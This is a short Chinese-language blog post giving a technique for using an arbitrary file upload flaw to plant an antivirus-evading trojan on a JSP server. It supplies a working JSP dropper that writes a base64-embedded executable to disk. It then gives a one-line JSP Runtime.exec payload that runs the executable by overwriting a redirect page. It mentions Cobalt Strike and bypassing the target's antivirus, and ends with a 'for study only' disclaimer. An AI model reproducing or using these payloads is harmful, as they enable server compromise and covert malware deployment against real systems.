jsp落地免杀马

场景:目标有一个前台任意上传,限制如下:

1、访问jsp的文件会跳转到登录,访问jsp以外的文件会404,所以排除了传webshell的方法

2、访问xxx!action请求会跳转到一个xxxx.jsp做中转,从xxxx.jsp跳转到登录

3、新建一个jsp里直接写exec执行cs,利用任意上传覆盖xxxx.jsp,中转时调用执行,被目标杀软拦截

思路:

模仿蓝凌oa代码执行的方式

首先准备好一个免杀马,然后对马进行base64替换下面的内容,上传jsp,访问jsp就落地aaa3.exe

1
2
3
4
5
6
7
8
9
10
<%@ page import="java.io.*" %>
<%
File f=new File("aaa3.exe");
f.createNewFile();
FileOutputStream fout=new FileOutputStream(f);
String a = "exe的base64编码";
fout.write(new sun.misc.BASE64Decoder().decodeBuffer(a));
fout.flush();
fout.close();
%>

落地之后再重新写一个上传覆盖执行aaa3.exe:

1
<%Runtime.getRuntime().exec(new String[]{"cmd","/c","aaa3.exe"});%>

声明:
本文章用于学习交流,严禁用于非法操作,出现后果一切自行承担,阅读此文章表示你已同意本声明。

Disclaimer:
This article is for study and communication. It is strictly forbidden to use it for illegal operations. All consequences shall be borne by yourself. Reading this article means that you have agreed to this statement.